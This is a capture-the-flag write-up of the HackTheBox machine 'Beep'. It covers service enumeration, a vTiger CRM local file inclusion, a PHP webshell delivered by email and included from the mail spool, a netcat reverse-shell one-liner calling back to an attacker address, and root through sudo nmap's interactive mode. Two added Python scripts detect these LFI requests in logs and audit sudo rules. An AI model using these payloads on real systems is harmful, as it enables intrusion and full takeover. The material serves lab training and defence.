Beep
An easy Linux box from HackTheBox: get initial access with a webshell delivered as mail and executed through an LFI, then get root by abusing sudo privileges on nmap.
Recon
Running the usual nmap scan:
sudo nmap -sC -sV -oA nmap/init 10.10.10.7
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_pop3-capabilities: EXPIRE(NEVER) RESP-CODES IMPLEMENTATION(Cyrus POP3 server v2) AUTH-RESP-CODE TOP STLS PIPELINING USER UIDL APOP LOGIN-DELAY(0)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 875/udp status
|_ 100024 1 878/tcp status
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_imap-capabilities: NAMESPACE MULTIAPPEND OK Completed NO THREAD=REFERENCES X-NETSCAPE LITERAL+ THREAD=ORDEREDSUBJECT BINARY IMAP4rev1 ATOMIC QUOTA LIST-SUBSCRIBED LISTEXT ID CHILDREN IDLE RENAME CONDSTORE CATENATE ANNOTATEMORE STARTTLS UIDPLUS URLAUTHA0001 RIGHTS=kxte SORT=MODSEQ SORT MAILBOX-REFERRALS IMAP4 UNSELECT ACL
|_imap-ntlm-info: ERROR: Script execution failed (use -d to debug)
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after: 2018-04-07T08:22:08
|_ssl-date: 2022-09-20T18:47:29+00:00; +1s from scanner time.
|_http-server-header: Apache/2.2.3 (CentOS)
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Elastix - Login page
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-known-key: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
3306/tcp open mysql MySQL (unauthorized)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
4445/tcp open upnotifyp?
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com
Running searchsploit against the enumerated versions turns up no easy wins.
Next up, a gobuster run:
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 40 --url https://10.10.10.7 -x php -k
This finds a long list of directories; however, when navigating to them, most are locked behind the Elastix login page.
/images (Status: 301) [Size: 310] [--> https://10.10.10.7/images/]
/admin (Status: 301) [Size: 309] [--> https://10.10.10.7/admin/]
/modules (Status: 301) [Size: 311] [--> https://10.10.10.7/modules/]
/themes (Status: 301) [Size: 310] [--> https://10.10.10.7/themes/]
/register.php (Status: 200) [Size: 1785]
/help (Status: 301) [Size: 308] [--> https://10.10.10.7/help/]
/config.php (Status: 200) [Size: 1785]
/var (Status: 301) [Size: 307] [--> https://10.10.10.7/var/]
/mail (Status: 301) [Size: 308] [--> https://10.10.10.7/mail/]
/static (Status: 301) [Size: 310] [--> https://10.10.10.7/static/]
/lang (Status: 301) [Size: 308] [--> https://10.10.10.7/lang/]
/libs (Status: 301) [Size: 308] [--> https://10.10.10.7/libs/]
/index.php (Status: 200) [Size: 1785]
/panel (Status: 301) [Size: 309] [--> https://10.10.10.7/panel/]
/configs (Status: 301) [Size: 311] [--> https://10.10.10.7/configs/]
/recordings (Status: 301) [Size: 314] [--> https://10.10.10.7/recordings/]
/vtigercrm (Status: 301) [Size: 313] [--> https://10.10.10.7/vtigercrm/]
However, navigating to /vtigercrm/ reveals vTiger CRM 5.1.0, which is vulnerable to LFI:
searchsploit vtiger
vTiger CRM 5.1.0 - Local File Inclusion | php/webapps/18770.txt
Looking at the PoC, it's an LFI through the module_name URL parameter, with a null byte to terminate the path:
https://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00
Exploitation
To exploit this, I need to get a file containing PHP onto the server so the LFI can include it as a webshell.
I tried log poisoning for a while, but it never worked.
Instead, I opted to deliver the webshell via email.
To enumerate users, I used the PoC to leak /etc/passwd, which shows a user named "asterisk".
To check whether that user exists on the mail server, connect to port 25 with netcat and ask Postfix to verify it with VRFY:
kali> nc 10.10.10.7 25
220 beep.localdomain ESMTP Postfix
VRFY asterisk
252 2.0.0 asterisk
Since it does, I can send a simple PHP webshell to that user with swaks:
swaks --to asterisk@localhost --from gg@htb.com --header "Subject: webshell" --body 'codexec: <?php system($_REQUEST["cmd"]); ?>' --server 10.10.10.7
=== Trying 10.10.10.7:25...
=== Connected to 10.10.10.7.
<- 220 beep.localdomain ESMTP Postfix
-> EHLO kali
<- 250-beep.localdomain
<- 250-PIPELINING
<- 250-SIZE 10240000
<- 250-VRFY
<- 250-ETRN
<- 250-ENHANCEDSTATUSCODES
<- 250-8BITMIME
<- 250 DSN
-> MAIL FROM:<gg@htb.com>
<- 250 2.1.0 Ok
-> RCPT TO:<asterisk@localhost>
<- 250 2.1.5 Ok
-> DATA
<- 354 End data with <CR><LF>.<CR><LF>
-> Date: Tue, 20 Sep 2022 18:39:35 -0400
-> To: asterisk@localhost
-> From: gg@htb.com
-> Subject: webshell
-> Message-Id: <20220920183935.063066@kali>
-> X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
->
-> codexec: <?php system($_REQUEST["cmd"]); ?>
->
->
-> .
<- 250 2.0.0 Ok: queued as C6C92D92FD
-> QUIT
<- 221 2.0.0 Bye
=== Connection closed with remote host
Now in the browser, include the user's mail spool through the LFI to see if it worked:
https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../../../../../var/mail/asterisk%00&cmd=id
And it does! We have code execution.
Now upgrade to a reverse shell by URL-encoding a netcat reverse shell one-liner:
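From the defender's side, the requests above leave a distinctive trail in the web server's access log. As an added example (not part of the original write-up), a small Python triage script that URL-decodes each query parameter and reports null-byte truncation, ../ traversal, references to /etc/passwd, the mail spool or log files, and a cmd parameter riding alongside the include; the log lines are constructed, with the two LFI URLs taken from this write-up.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed Apache combined-format access-log lines: the two LFI requests
# reproduce the URLs from the write-up, the client and timestamps are made up.
SAMPLE_LOG = """\
10.10.14.5 - - [20/Sep/2022:18:41:02 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1435 "-" "Mozilla/5.0"
10.10.14.5 - - [20/Sep/2022:18:45:11 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../../../../../var/mail/asterisk%00&cmd=id HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.10.14.5 - - [20/Sep/2022:18:46:30 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=Leads HTTP/1.1" 200 312 "-" "Mozilla/5.0"
10.10.14.5 - - [20/Sep/2022:18:47:00 +0000] "GET /index.php HTTP/1.1" 200 1785 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Files an LFI is typically pointed at: secrets, or places where attacker-controlled
# text (mail spool, logs) lands on disk and can be included as PHP.
SENSITIVE = ("/etc/passwd", "/var/mail/", "/var/log/")

def analyse_request(target):
    """Return a list of findings for one request target, [] if it looks clean."""
    findings = []
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    for key, value in params:
        value = unquote(value)  # parse_qsl decoded once; this catches double-encoding
        if "\x00" in value:
            findings.append(f"{key}: null-byte truncation")
        if "../" in value or "..\\" in value:
            findings.append(f"{key}: directory traversal")
        for path in SENSITIVE:
            if path in value:
                findings.append(f"{key}: reference to {path}")
    if findings and any(k == "cmd" for k, _ in params):
        findings.append("cmd parameter alongside the include: likely webshell invocation")
    return findings

def scan_log(text):
    """Return (line_no, target, findings) for every suspicious request in text."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if m and (findings := analyse_request(m.group("target"))):
            hits.append((no, m.group("target"), findings))
    return hits

if __name__ == "__main__":
    for no, target, findings in scan_log(SAMPLE_LOG):
        print(f"line {no}: {target}", *findings, sep="\n    ")
```

Run against a real access.log the same way; the legitimate sortfieldsjson.php request (module_name=Leads) is deliberately in the sample to show it is not flagged.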
kali> urlencode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc KALI_IP 4444 >/tmp/f"
rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.5%204444%20%3E%2Ftmp%2Ff
Then start a listener on 4444 and, after sending the encoded command as the cmd parameter, catch the shell:
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.7] 58425
sh: no job control in this shell
sh-3.2$ whoami
asterisk
sh-3.2$
Quickly upgrade to a fully interactive TTY:
sh-3.2$ python -c 'import pty;pty.spawn("/bin/bash")'
bash-3.2$ export TERM=xterm
CTRL+Z
kali> stty raw -echo; fg
Now I have a fully interactive terminal as the asterisk user.
Running sudo -l to see what this user is allowed to run:
sudo -l
Matching Defaults entries for asterisk on this host:
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY"
User asterisk may run the following commands on this host:
(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /bin/touch
(root) NOPASSWD: /bin/chmod
(root) NOPASSWD: /bin/chown
(root) NOPASSWD: /sbin/service
(root) NOPASSWD: /sbin/init
(root) NOPASSWD: /usr/sbin/postmap
(root) NOPASSWD: /usr/sbin/postfix
(root) NOPASSWD: /usr/sbin/saslpasswd2
(root) NOPASSWD: /usr/sbin/hardware_detector
(root) NOPASSWD: /sbin/chkconfig
(root) NOPASSWD: /usr/sbin/elastix-helper
We can run nmap with sudo without a password, and this old version still supports --interactive, so escalating to root is quick:
sudo nmap --interactive
Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
whoami
root
Now we have a root shell and can read root.txt.
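The root cause here is a sudoers policy that hands out passwordless root on a long list of binaries, one of which can spawn a shell. As an added example (not part of the original write-up), a Python audit helper that parses `sudo -l` output like the one shown above and flags root entries that are not on an explicit allow-list, calling out NOPASSWD and nmap's interactive mode; the sample input is constructed from the write-up's output, abbreviated, with one password-requiring entry added to exercise the check.

```python
import re

# Constructed sample modelled on the `sudo -l` output above (abbreviated); the
# final entry, which still requires a password, is added to exercise the check.
SUDO_L_OUTPUT = """\
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/chmod
    (root) /usr/sbin/postfix
"""
# (runas) [TAG: ...] /path/to/command
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S+)")
# Binaries whose legitimate features hand the caller a shell. Only nmap's
# interactive mode (the escape used above) is listed; extend from your own review.
SHELL_ESCAPES = {"nmap": "legacy --interactive mode runs shell commands via !"}

def parse_sudo_l(text):
    """Parse the 'may run the following commands' block of `sudo -l` output."""
    entries, in_cmds = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_cmds = True
            continue
        m = ENTRY_RE.match(line) if in_cmds else None
        if m:
            entries.append({"runas": m.group("runas"), "cmd": m.group("cmd"),
                            "tags": set(re.findall(r"[A-Z]+", m.group("tags")))})
    return entries

def audit(entries, allowed=frozenset()):
    """Return [(cmd, [reasons])] for root entries that are not on the allow-list."""
    findings = []
    for e in entries:
        if e["runas"] not in ("root", "ALL") or e["cmd"] in allowed:
            continue
        reasons = []
        if "NOPASSWD" in e["tags"]:
            reasons.append("runs as root without a password")
        name = e["cmd"].rsplit("/", 1)[-1]
        if name in SHELL_ESCAPES:
            reasons.append(SHELL_ESCAPES[name])
        if reasons:
            findings.append((e["cmd"], reasons))
    return findings
```

Feed it `sudo -l` output captured from each service account; anything it returns is either a policy exception to document in the allow-list or an entry to remove.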